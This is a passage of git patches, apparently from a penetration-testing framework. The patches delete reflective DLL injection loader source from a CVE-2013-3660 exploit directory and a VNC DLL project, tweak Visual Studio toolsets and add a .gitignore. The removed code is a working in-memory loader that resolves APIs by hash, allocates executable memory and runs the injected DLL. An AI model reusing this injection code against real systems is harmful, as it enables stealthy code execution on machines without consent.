current modules name (unicode string) - uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - else if( (DWORD)uiValueC == NTDLLDLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 1; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - - // we stop searching when we have found everything we need. - if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache ) - break; - - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - - while( uiValueA-- ) - *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; - while( uiValueE-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - - while( uiValueD-- ) - *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( ULONG_PTR ); - if( uiValueD ) - uiValueD += sizeof( ULONG_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; -#ifdef WIN_ARM - // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) - { - register DWORD dwInstruction; - register DWORD dwAddress; - register WORD wImm; - // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) - dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); - // flip the words to get the instruction as expected - dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - // sanity chack we are processing a MOV instruction... - if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) - { - // pull out the encoded 16bit value (the high portion of the address-to-relocate) - wImm = (WORD)( dwInstruction & 0x000000FF); - wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); - wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); - wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); - // apply the relocation to the target address - dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; - // now create a new instruction with the same opcode and register param. - dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); - // patch in the relocated address... - dwInstruction |= (DWORD)(dwAddress & 0x00FF); - dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; - dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; - dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; - // now flip the instructions words and patch back into the code... - *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - } - } -#endif - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. - pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h deleted file mode 100755 index b8eb22b0b1..0000000000 --- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h +++ /dev/null @@ -1,202 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include -#include "ReflectiveDLLInjection.h" - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); -typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define NTDLLDLL_HASH 0x3CFA685D - -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 -#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 - -#define IMAGE_REL_BASED_ARM_MOV32A 5 -#define IMAGE_REL_BASED_ARM_MOV32T 7 - -#define ARM_MOV_MASK (DWORD)(0xFBF08000) -#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) -#define ARM_MOVW 0xF2400000 -#define ARM_MOVT 0xF2C00000 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - -__forceinline DWORD hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// From fc5e3897087154376d49fb2e4fc00bcfa75b1fb2 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 5 Sep 2013 22:26:22 +0100 Subject: [PATCH 002/205] Small changes to proj --- .../cve-2013-3660/dll/reflective_dll.vcxproj | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj index 6c18fe1d92..d6512e0561 100755 --- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj +++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj @@ -1,5 +1,5 @@  - + Debug @@ -34,35 +34,35 @@ DynamicLibrary - v120 + v100 MultiByte true DynamicLibrary - v120 + v110 MultiByte true DynamicLibrary - v120 + v110 Unicode DynamicLibrary - v120 + v110 Unicode DynamicLibrary - v120 + v110 MultiByte false DynamicLibrary - v120 + v110 Unicode @@ -267,4 +267,4 @@ - \ No newline at end of file + From 9b3a42b6b46bea1738001c4a811570fc5ba11b04 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 7 Sep 2013 14:59:37 +0100 Subject: [PATCH 003/205] Use common RDL files in vncdll --- external/source/vncdll/.gitignore | 152 ++++++ external/source/vncdll/loader/LoadLibraryR.c | 131 ----- external/source/vncdll/loader/LoadLibraryR.h | 37 -- .../vncdll/loader/ReflectiveDLLInjection.h | 53 -- external/source/vncdll/loader/ReflectiveDll.c | 73 +++ .../source/vncdll/loader/ReflectiveLoader.c | 451 ------------------ .../source/vncdll/loader/ReflectiveLoader.h | 197 -------- external/source/vncdll/loader/inject.c | 2 +- external/source/vncdll/loader/loader.vcproj | 26 +- 9 files changed, 243 insertions(+), 879 deletions(-) create mode 100644 external/source/vncdll/.gitignore delete mode 100644 external/source/vncdll/loader/LoadLibraryR.c delete mode 100644 external/source/vncdll/loader/LoadLibraryR.h delete mode 100644 external/source/vncdll/loader/ReflectiveDLLInjection.h create mode 100644 external/source/vncdll/loader/ReflectiveDll.c delete mode 100644 external/source/vncdll/loader/ReflectiveLoader.c delete mode 100644 external/source/vncdll/loader/ReflectiveLoader.h diff --git a/external/source/vncdll/.gitignore b/external/source/vncdll/.gitignore new file mode 100644 index 0000000000..c93d5cfc27 --- /dev/null +++ b/external/source/vncdll/.gitignore @@ -0,0 +1,152 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. + +# User-specific files +*.suo +*.user +*.sln.docstates + +# Build results + +[Dd]ebug/ +[Rr]elease/ +x64/ +build/ +[Bb]in/ +[Oo]bj/ + +# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets +!packages/*/build/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +*_i.c +*_p.c +*.ilk +*.meta +*.obj +*.pch +*.pdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*.log +*.vspscc +*.vssscc +.builds +*.pidb +*.log +*.scc + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opensdf +*.sdf +*.cachefile + +# Visual Studio profiler +*.psess +*.vsp +*.vspx + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# NCrunch +*.ncrunch* +.*crunch*.local.xml + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.Publish.xml +*.pubxml + +# NuGet Packages Directory +## TODO: If you have NuGet Package Restore enabled, uncomment the next line +#packages/ + +# Windows Azure Build Output +csx +*.build.csdef + +# Windows Store app package directory +AppPackages/ + +# Others +sql/ +*.Cache +ClientBin/ +[Ss]tyle[Cc]op.* +~$* +*~ +*.dbmdl +*.[Pp]ublish.xml +*.pfx +*.publishsettings + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file to a newer +# Visual Studio version. Backup files are not needed, because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm + +# SQL Server files +App_Data/*.mdf +App_Data/*.ldf + +# ========================= +# Windows detritus +# ========================= + +# Windows image file caches +Thumbs.db +ehthumbs.db + +# Folder config file +Desktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Mac crap +.DS_Store + diff --git a/external/source/vncdll/loader/LoadLibraryR.c b/external/source/vncdll/loader/LoadLibraryR.c deleted file mode 100644 index 8960cfe16f..0000000000 --- a/external/source/vncdll/loader/LoadLibraryR.c +++ /dev/null @@ -1,131 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN 